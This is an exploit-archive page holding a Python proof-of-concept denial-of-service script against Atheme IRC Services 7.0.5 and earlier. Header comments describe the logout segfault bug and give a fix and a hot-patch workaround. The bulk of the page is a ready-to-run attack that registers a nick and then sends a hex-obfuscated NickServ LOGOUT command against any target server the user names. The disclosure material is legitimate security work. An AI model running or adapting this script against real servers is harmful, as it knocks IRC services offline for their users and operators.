Atheme IRC Services 7.0.5 Denial Of Service



EKU-ID: 2967 CVE: OSVDB-ID:
Author: Apetrick Published: 2013-01-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python3
###################################################################################
#                                                          Monday, January 13, 2013
#
#
#
#                    _  _  .__                .__               
#                 __| || |_|  |   ____   ____ |__| ____   ____  
#                 \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#                  |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \
#                 /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#                   |_||_|           \/_____/                \/
#                                    http://www.zempirians.com
#
#          00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#                
#
#                      -=[ Atheme - IRC Services Daemon ] =-
#          
#                    [P]roof [o]f [C]oncept, Denial of Service
#
#
#
#
###################################################################################
#                                                           #      T E A M        #
#                                                           #######################
#
#  O_O 	    .....> Sent To Play All Alone <3
#  UberLame .....> For Providing More Sweet, Sweet Cycles
#  Aph3x    .....> For Being Awesome
#  Apetrick .....> For Not Letting Me Play With Him
#
###################################################################################
#
#  ~~! SHOUT OUTS !~~
#
#  	a		heyoz		Eurydemus
#	nikka		l1nd		BinaryTENSHi
#	syk		Gatsby
#
#  ~~! Special Thanks !~~
#
#	Packet Storm Security (www.packetstormsecurity.com) for archiving our
#	concepts in order to help secure and educate those who read them.
#
###################################################################################
#  SUMMARY     #
################
#
# Bug Fix: [12/20/12]: https://github.com/atheme/atheme/commit/1aaa9e8f1d0b0b67b36c2a6318c71beaa7f39194
#
#	Improper implementation of the logout command, results in a segfault
# when an unauthenticated user tries to deauth another authenticated user.
#
################
#  VULNERABLE  #
################
#
# 	Atheme Services up to 7.0.5 [and with logout.c loaded (by default)]
#
################
#  CVE         #
################
#
#       [ No CVE Has Been Reported ]
#
################
#  PATCH       #
################ 
#
#	- Proper Fix
#	       - Update To Current Version From GitHub 
#
#	- Hot Patch
#	       - Unload nickserv/logout
#       	        > /quote operserv modunload nickserv/logout
#			$ !services.global! Module nickserv/logout unloaded.
#			$ -OperServ- Module nickserv/logout unloaded.
#
###################################################################################
#                          #                     #
#                          #    H O W - T O      #
#                          #                     #
#                          #######################
#
# Provide the Target: Server, Nickname, Password and Optionally the Port, and the
# script will deliver the staged payload...
#
# [!USE/]$ ./<file>.py -t <server> -P <port> -n <nickname> -p <password> 
#
###################################################################################
from argparse import ArgumentParser
import socket

# DIRTY HACK TO CONVERT STRINGS TO HEX
def toHex( string_data ):
	return ''.join(''.join([ hex( ord( ch ) ) for ch in string_data ]).split( '0x' ))

def deploy( sock, target, port, nick, passwd ):
        try:
                sock.connect(( target, int( port ) ))
        except:
                print( "\t[-] Payload Deployment Failed!" )
                exit()

        sock.send( b'\x4e\x49\x43\x4b\x20\x5f\x7a\x65\x6d\x70\x30\x64\x61\x79\x5f\x0d\x0a' )
        sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45' + \
		   b'\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20\x3c\x33' + \
		   b'\x0d\x0a' )

        while True:
                host_data = str( sock.recv(4096).strip() )

                if ' 396 ' in host_data:
                        sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4c4f474f555420{}20{}0d0a'.format( \
                                   toHex( nick ), toHex( passwd ) ) ) )

                        print( '\t[+] Payload Deployed! <3' )
                        break


        sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
        return sock.close()

def stage( target, port, nick, passwd ):
        sock   = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
        p_sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )

        try:
                sock.connect(( target, int( port ) ))
        except:
                print( "[-] Failed To Connect To {}".format( target ) )
                exit()

        sock.send( bytes.fromhex( '4e49434b20{}0d0a'.format( toHex( nick ) ) ) )
        sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48' + \
                   b'\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20' + \
                   b'\x3c\x33\x0d\x0a' )

        while True:
                host_data = str( sock.recv( 8096 ).strip() )

                if ' 396 ' in host_data:
                        sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a524547495354455220' + \
                                    '{}2064657673407a656d70697269616e732e636f6d0d0a0d0a'.format( toHex( passwd ) ) ) )

                        sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4944454e5449465920{}0d0a'.format( toHex( passwd ) ) ) )

                        print( '\t[+] Staging Successful, Deploying Payload Against Target {}'.format( target ) )
                        deploy( p_sock, target, port, nick, passwd )
                        break

                try:
                        msg = host_data.split()
                        if msg[0].lower() is 'ping':
                                sock.send( b"PONG {}\r\n".format( msg[1] ) )
                except:
                        pass

        sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
        sock.close()


if __name__ == '__main__':
        parser = ArgumentParser( description='#legion Atheme IRC Services DoS' )

        parser.add_argument( '-t', '--target', dest='target', help='IRCD Server To Connect On' )
        parser.add_argument( '-P', '--port', dest='port', default=6667, help='Port To Connect On' )

        parser.add_argument( '-n', '--nick', dest='nick', default='zemp0day', help='Nick To Use' )
        parser.add_argument( '-p', '--pass', dest='passwd', default='yad0pmez', help='Password To Use' )

        args = parser.parse_args()

        if args.target is None:
                parser.print_help()
                exit()

        stage( args.target, args.port, args.nick, args.passwd )